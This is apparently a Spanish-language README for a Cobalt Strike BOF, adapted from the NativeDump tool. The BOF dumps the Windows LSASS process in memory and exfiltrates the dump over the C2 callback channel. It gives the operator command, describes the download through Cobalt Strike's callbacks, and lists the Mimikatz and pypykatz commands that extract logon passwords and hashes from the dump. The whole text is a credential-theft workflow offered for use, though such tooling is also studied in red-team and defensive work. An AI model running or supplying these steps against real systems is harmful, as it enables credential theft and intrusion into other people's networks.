
BOF de Cobalt Strike que crea un minidump de LSASS en memoria y lo exfiltra a través del callback C2 para el análisis de credenciales sin conexión con Mimikatz o pypykatz.
Adaptación BOF de la herramienta https://github.com/ricardojoserf/NativeDump escrita por @ricardojoserf.
Importa NtDump.cna y ejecuta:
ntdump <filename>
El archivo minidump se creará en memoria y se descargará mediante CALLBACK_FILE y CALLBACK_FILE_WRITE. Una vez descargado, el archivo será visible en View -> Download.
Esto puede analizarse posteriormente con Mimikatz
mimikatz # sekurlsa::minidump <file path to downloaded minidump file>
mimikatz # sekurlsa::logonpasswords full
O con pypykatz
pypykatz lsa minidump <file path to downloaded minidump file>